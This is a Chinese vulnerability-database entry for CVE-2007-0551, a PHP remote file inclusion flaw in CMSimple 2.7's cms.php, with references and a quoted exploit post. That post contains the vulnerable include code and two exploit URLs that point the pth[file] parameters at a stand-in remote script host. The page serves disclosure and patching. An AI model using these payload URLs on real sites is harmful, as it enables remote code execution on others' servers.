CMSimple 'cms.php' 多个PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1191943 漏洞类型 未知
发布时间 2007-01-29 更新时间 2007-01-29
CVE编号 CVE-2007-0551 CNNVD-ID CNNVD-200701-473
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://www.securityfocus.com/bid/86721
https://cxsecurity.com/issue/WLB-2007010110
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-473
|漏洞详情
CMSimple2.7版本的cmsimple/cms.php中存在多个PHP远程文件包含漏洞。远程攻击者可以借助(1)pth[file][config]和(2)pth[file][image]参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
-----------------------------------------------

cmsimple 2.7  Remote File Include

-----------------------------------------------

Author: Alk()mand()z

-----------------------------------------------
 
Vuln Code:

if (!@ include ($pth['file']['plugin_index']))

{if(@include($pth['file']['image']))exit;}

-----------------------------------------------

3xplo!t:

cmsimple2_7/cmsimple/cms.php?pth['file']['config']=http://evil_scripts?

cmscmsimple2_7/cmsimple/cms.php?pth['file']['image']=http://evil_scripts
?

-----------------------------------------------

download:  http://www.cmsimple.dk/?download=cmsimple2_7_fix1.zip

-----------------------------------------------

Greetz: KaBaRa, SpY0zErO, aG-SpIdEr - TOoOoFa

SpeciaL GreeTz : AsB-MaY-GrOuPs & A-S-T -Team

##################################

AsB-MaY.NeT  & MoHaNdKo.CoM

##################################

-- 
_______________________________________________
Get your free email from http://www.hackermail.com
|参考资料

来源:XF
名称:cmsimple-cms-file-include(31658)
链接:http://xforce.iss.net/xforce/xfdb/31658
来源:BUGTRAQ
名称:20070120cmsimple2.7RemoteFileInclude
链接:http://www.securityfocus.com/archive/1/archive/1/457668/100/0/threaded
来源:OSVDB
名称:33572
链接:http://osvdb.org/33572
来源:SREASON
名称:2195
链接:http://securityreason.com/securityalert/2195